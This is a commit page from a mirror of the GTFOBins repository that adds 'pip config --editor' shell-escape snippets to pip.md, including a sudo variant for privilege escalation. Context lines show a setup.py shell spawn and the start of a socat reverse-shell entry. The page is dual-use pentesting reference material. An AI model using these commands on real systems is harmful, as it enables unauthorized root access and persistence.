public-mirrors/GTFOBins.github.io
1
0
Fork 0
mirror of https://github.com/GTFOBins/GTFOBins.github.io synced 2024-10-22 16:48:09 +02:00
Code Issues Projects Releases Wiki Activity

Include pip config --editor option which allows execution of arbitrary files

Browse Source
This commit is contained in:
raj3shp 2024-07-21 11:13:19 +05:30 committed by GitHub
parent 9ec64ef195
commit aaefb9a397
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 8 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

8
_gtfobins/pip.md
View File

@ -5,6 +5,10 @@ functions:
TF=$(mktemp -d)
echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
pip install $TF
- code: |
TF=$(mktemp -d)
printf '#!/bin/bash\n/bin/bash' > $TF/pwn.sh && chmod +x $TF/pwn.sh
pip config --editor $TF/pwn.sh edit
reverse-shell:
- description: Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell.
code: |
@ -70,4 +74,8 @@ functions:
TF=$(mktemp -d)
echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
sudo pip install $TF
- code: |
TF=$(mktemp -d)
printf '#!/bin/bash\n/bin/bash' > $TF/pwn.sh && chmod +x $TF/pwn.sh
sudo pip config --editor $TF/pwn.sh edit
---